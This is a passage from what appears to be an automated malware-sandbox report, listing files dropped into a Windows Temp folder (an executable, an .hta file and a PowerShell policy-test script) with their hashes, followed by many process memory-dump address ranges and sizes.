                            6ab38e499f36671ab631982f7c5a6575d95a925a652c55bda62ffb7f3dfef6a3

                            SHA512

                            3a8ecb03a685c677b430293d4d55a91352af27ae9427b01684e5ba81f5fa63129ea599f44d8538bfc11e74e9510ad2abe23d7f1658b31b7aefc7043e262a7dbf

                          • C:\Users\Admin\AppData\Local\Temp\1091816001\bc8b02db62.exe

                            Filesize

                            3.8MB

                            MD5

                            632075034a073568258b2f6c3084b262

                            SHA1

                            757d65e1418e30022c8b3d01530618ebbeba3314

                            SHA256

                            6c56e6d6f5a5d32ec382d81e82935144fe9448502ba972bf5c18d907da6ea72d

                            SHA512

                            33c80fe63705388a2b434b436d369294832ac9f90a273f806cdb3a2ac3e55a7f60c9456691d22c10ca3843d5e62d964829787fa91b5b6b06074f2dfc84a6e274

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3e1byhq2.z0a.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\dXeJ8ek7B.hta

                            Filesize

                            720B

                            MD5

                            f439df364a5a7b1215a044fac18c2cb8

                            SHA1

                            2529ffcfe1f0168b9d6dd9db51c9238b03a767b3

                            SHA256

                            8cb65544a917dfd722af66b221f957527b786f1810e8123f25c1473e63d1a545

                            SHA512

                            5a09ebc3e23db1770cd8c87abd3b286230caadade14ff23378a2baeef6eb9a4feb47536c040826e5a6b894ffa2427ba34b74d7e9f4234565eabc2fb394308ea4

                          • memory/1536-208-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-322-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-265-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-340-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-79-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-81-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-339-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-338-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-287-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-329-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-46-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-308-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1536-122-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1656-293-0x0000000000400000-0x000000000042F000-memory.dmp

                            Filesize

                            188KB

                          • memory/1740-203-0x0000000000FB0000-0x0000000001BEA000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/1740-229-0x0000000000FB0000-0x0000000001BEA000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/1740-230-0x0000000000FB0000-0x0000000001BEA000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/1740-275-0x0000000000FB0000-0x0000000001BEA000-memory.dmp

                            Filesize

                            12.2MB

                          • memory/1800-269-0x0000000000400000-0x000000000042F000-memory.dmp

                            Filesize

                            188KB

                          • memory/1800-280-0x0000000010000000-0x000000001001C000-memory.dmp

                            Filesize

                            112KB

                          • memory/1800-237-0x0000000000400000-0x000000000042F000-memory.dmp

                            Filesize

                            188KB

                          • memory/2452-32-0x0000000000CE0000-0x0000000001000000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/2452-47-0x0000000000CE0000-0x0000000001000000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/2996-326-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3664-100-0x00000000009B0000-0x0000000001042000-memory.dmp

                            Filesize

                            6.6MB

                          • memory/3664-219-0x00000000009B0000-0x0000000001042000-memory.dmp

                            Filesize

                            6.6MB

                          • memory/3664-150-0x00000000009B0000-0x0000000001042000-memory.dmp

                            Filesize

                            6.6MB

                          • memory/3664-101-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                            Filesize

                            972KB

                          • memory/3664-149-0x00000000009B0000-0x0000000001042000-memory.dmp

                            Filesize

                            6.6MB

                          • memory/3664-276-0x00000000009B0000-0x0000000001042000-memory.dmp

                            Filesize

                            6.6MB

                          • memory/3972-82-0x00000000000B0000-0x00000000003AB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/3972-80-0x00000000000B0000-0x00000000003AB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/4704-22-0x00000000077B0000-0x0000000007846000-memory.dmp

                            Filesize

                            600KB

                          • memory/4704-5-0x0000000005BD0000-0x0000000005C36000-memory.dmp

                            Filesize

                            408KB

                          • memory/4704-23-0x0000000007750000-0x0000000007772000-memory.dmp

                            Filesize

                            136KB

                          • memory/4704-2-0x0000000002970000-0x00000000029A6000-memory.dmp

                            Filesize

                            216KB

                          • memory/4704-20-0x00000000067C0000-0x00000000067DA000-memory.dmp

                            Filesize

                            104KB

                          • memory/4704-19-0x0000000007BD0000-0x000000000824A000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/4704-3-0x0000000005470000-0x0000000005A98000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/4704-4-0x00000000053F0000-0x0000000005412000-memory.dmp

                            Filesize

                            136KB

                          • memory/4704-18-0x00000000062D0000-0x000000000631C000-memory.dmp

                            Filesize

                            304KB

                          • memory/4704-6-0x0000000005C40000-0x0000000005CA6000-memory.dmp

                            Filesize

                            408KB

                          • memory/4704-17-0x0000000006290000-0x00000000062AE000-memory.dmp

                            Filesize

                            120KB

                          • memory/4704-16-0x0000000005DB0000-0x0000000006104000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/4704-24-0x0000000008800000-0x0000000008DA4000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/4932-294-0x00000000007B0000-0x00000000011C5000-memory.dmp

                            Filesize

                            10.1MB

                          • memory/4932-289-0x00000000007B0000-0x00000000011C5000-memory.dmp

                            Filesize

                            10.1MB

                          • memory/4932-288-0x00000000007B0000-0x00000000011C5000-memory.dmp

                            Filesize

                            10.1MB

                          • memory/4932-267-0x00000000007B0000-0x00000000011C5000-memory.dmp

                            Filesize

                            10.1MB

                          • memory/5056-84-0x0000000000950000-0x0000000000C70000-memory.dmp

                            Filesize

                            3.1MB